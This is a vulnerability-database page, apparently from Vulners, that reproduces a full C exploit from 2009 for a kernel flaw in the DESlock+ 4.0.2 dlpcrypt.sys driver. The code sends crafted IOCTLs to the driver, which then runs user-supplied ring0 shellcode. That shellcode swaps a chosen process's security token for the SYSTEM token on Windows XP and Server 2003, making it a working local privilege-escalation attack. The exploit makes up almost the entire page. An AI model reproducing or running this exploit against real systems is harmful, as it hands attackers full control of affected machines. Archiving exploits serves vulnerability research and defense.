Vulners
Lucene search
DESlock+ 4.0.2 dlpcrypt.sys Local Kernel ring0 Code Execution Exploit
/* deslock-dlpcrypt.c
*
* Copyright (c) 2009 by <[email protected]>
*
* DESlock+ 4.0.2 local kernel SYSTEM exploit
* by mu-b - Thu 18 Jun 2009
*
* - Tested on: dlpcrypt.sys 0.1.1.27
*
* .text:0001BB2E: 'what do ya want for nothing?'
* - hmmm, something that doesn't pass kernel mode pointers
* between kernel and userland?
*
* Compile: MinGW + -lntdll
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2009!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#define DLPCRYPT_IOCTL_ENABLED 0x8001200C
#define DLPCRYPT_IOCTL_ADD 0x80012004
#define DLPCRYPT_IOCTL_PROCESS 0x80012010
#define DLPCRYPT_FLAG1 0x13B45FA8
#define DLPCRYPT_FLAG2 0xBFD294C9
static unsigned char win32_fixup[] =
"\x56";
/* Win2k3 SP1/2 - kernel EPROCESS token switcher
* by mu-b <[email protected]>
*/
static unsigned char win2k3_ring0_shell[] =
/* _ring0 */
"\xb8\x24\xf1\xdf\xff"
"\x8b\x00"
"\x8b\xb0\x18\x02\x00\x00"
"\x89\xf0"
/* _sys_eprocess_loop */
"\x8b\x98\x94\x00\x00\x00"
"\x81\xfb\x04\x00\x00\x00"
"\x74\x11"
"\x8b\x80\x9c\x00\x00\x00"
"\x2d\x98\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
"\xeb\x21"
/* _sys_eprocess_found */
"\x89\xc1"
"\x89\xf0"
/* _cmd_eprocess_loop */
"\x8b\x98\x94\x00\x00\x00"
"\x81\xfb\x00\x00\x00\x00"
"\x74\x10"
"\x8b\x80\x9c\x00\x00\x00"
"\x2d\x98\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
/* _not_found */
"\xcc"
/* _cmd_eprocess_found
* _ring0_end */
/* copy tokens!$%! */
"\x8b\x89\xd8\x00\x00\x00"
"\x89\x88\xd8\x00\x00\x00"
"\x90";
static unsigned char winxp_ring0_shell[] =
/* _ring0 */
"\xb8\x24\xf1\xdf\xff"
"\x8b\x00"
"\x8b\x70\x44"
"\x89\xf0"
/* _sys_eprocess_loop */
"\x8b\x98\x84\x00\x00\x00"
"\x81\xfb\x04\x00\x00\x00"
"\x74\x11"
"\x8b\x80\x8c\x00\x00\x00"
"\x2d\x88\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
"\xeb\x21"
/* _sys_eprocess_found */
"\x89\xc1"
"\x89\xf0"
/* _cmd_eprocess_loop */
"\x8b\x98\x84\x00\x00\x00"
"\x81\xfb\x00\x00\x00\x00"
"\x74\x10"
"\x8b\x80\x8c\x00\x00\x00"
"\x2d\x88\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
/* _not_found */
"\xcc"
/* _cmd_eprocess_found
* _ring0_end */
/* copy tokens!$%! */
"\x8b\x89\xc8\x00\x00\x00"
"\x89\x88\xc8\x00\x00\x00"
"\x90";
static unsigned char win32_ret[] =
"\x5e"
"\x58"
"\x58"
"\x33\xc0"
"\x5e"
"\x5d"
"\xc2\x0c\x00";
struct ioctl_req_enable {
int flag[2];
int len;
int result;
int enabled;
char pad[0x38 - 0x14];
};
struct ioctl_req {
int flag[2];
int len;
int result;
int action;
struct ioctl_ptr *ptr;
char pad[0x38 - 0x18];
};
struct ioctl_ptr {
char pad[0x8];
struct ioctl_pid *ppid;
int action;
char _pad[0x4];
struct ioctl_func *func;
};
struct ioctl_pid {
char pad[0x14];
DWORD pid;
};
struct ioctl_func {
void *func_ptr;
};
static PCHAR
fixup_ring0_shell (DWORD ppid, DWORD *zlen)
{
DWORD dwVersion, dwMajorVersion, dwMinorVersion;
dwVersion = GetVersion ();
dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion)));
dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion)));
if (dwMajorVersion != 5)
{
fprintf (stderr, "* GetVersion, unsupported version\n");
exit (EXIT_FAILURE);
}
switch (dwMinorVersion)
{
case 1:
*zlen = sizeof winxp_ring0_shell - 1;
*(PDWORD) &winxp_ring0_shell[55] = ppid;
return (winxp_ring0_shell);
case 2:
*zlen = sizeof win2k3_ring0_shell - 1;
*(PDWORD) &win2k3_ring0_shell[58] = ppid;
return (win2k3_ring0_shell);
default:
fprintf (stderr, "* GetVersion, unsupported version\n");
exit (EXIT_FAILURE);
}
return (NULL);
}
int
main (int argc, char **argv)
{
struct ioctl_req_enable req_enable;
struct ioctl_req req;
struct ioctl_ptr ptr;
struct ioctl_pid pid;
struct ioctl_func func;
LPVOID c_addr, zpage, zbuf;
DWORD rlen, zlen, ppid;
HANDLE hFile;
BOOL bResult;
printf ("DESlock+ 4.0.2 local kernel SYSTEM exploit\n"
"by: <[email protected]>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <processid to elevate>\n", argv[0]);
exit (EXIT_SUCCESS);
}
ppid = atoi (argv[1]);
hFile = CreateFileA ("\\\\.\\DLPCryptCore", FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}
zpage = VirtualAlloc (NULL, 0x10000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (zpage == NULL)
{
fprintf (stderr, "* VirtualAlloc failed\n");
exit (EXIT_FAILURE);
}
printf ("* allocated page: 0x%08X [%d-bytes]\n",
zpage, 0x10000);
memset (zpage, 0xCC, 0x10000);
zbuf = fixup_ring0_shell (ppid, &zlen);
memcpy (zpage, win32_fixup, sizeof (win32_fixup) - 1);
memcpy (zpage + sizeof (win32_fixup) - 1, zbuf, zlen);
memcpy (zpage + sizeof (win32_fixup) + zlen - 1,
win32_ret, sizeof (win32_ret) - 1);
memset (&req_enable, 0, sizeof req_enable);
req_enable.flag[0] = DLPCRYPT_FLAG1;
req_enable.flag[1] = DLPCRYPT_FLAG2;
req_enable.len = sizeof req_enable;
printf ("* verifying context... ");
bResult = DeviceIoControl (hFile, DLPCRYPT_IOCTL_ENABLED,
&req_enable, sizeof req_enable,
&req_enable, sizeof req_enable, &rlen, 0);
if (!bResult)
{
fprintf (stderr, "* DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
printf ("result: %d, enabled: %d\n", req_enable.result, req_enable.enabled);
printf ("* adding pid [%d]... ", GetCurrentProcessId ());
bResult = DeviceIoControl (hFile, DLPCRYPT_IOCTL_ADD,
&req_enable, sizeof req_enable,
&req_enable, sizeof req_enable, &rlen, 0);
if (!bResult)
{
fprintf (stderr, "* DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
printf ("done\n");
memset (&req, 0, sizeof req);
req.flag[0] = DLPCRYPT_FLAG1;
req.flag[1] = DLPCRYPT_FLAG2;
req.len = sizeof req;
req.action = 2;
req.ptr = &ptr;
memset (&ptr, 0, sizeof ptr);
ptr.ppid = &pid;
ptr.action = 2;
ptr.func = &func;
memset (&pid, 0, sizeof pid);
pid.pid = GetCurrentProcessId ();
memset (&func, 0, sizeof func);
func.func_ptr = &c_addr;
c_addr = (LPVOID) zpage;
printf ("* req.ptr: 0x%08X\n", &ptr);
printf ("* @0x%08X: ppid_ptr: 0x%08X, func_ptr: 0x%08X\n",
&ptr, ptr.ppid, ptr.func);
printf ("* @0x%08X: func_ptr: 0x%08X\n", ptr.func, func.func_ptr);
printf ("* @0x%08X: func_ptr: 0x%08X\n", &c_addr, c_addr);
/* jump to our address :) */
printf ("* jumping.. ");
bResult = DeviceIoControl (hFile, DLPCRYPT_IOCTL_PROCESS,
&req, sizeof req, &req, sizeof req, &rlen, 0);
if (!bResult)
{
fprintf (stderr, "* DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
printf ("done\n\n"
"* hmmm, you didn't STOP the box?!?!\n");
CloseHandle (hFile);
return (EXIT_SUCCESS);
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Jun 2009 00:00Current
7.1High risk
Vulners AI Score7.1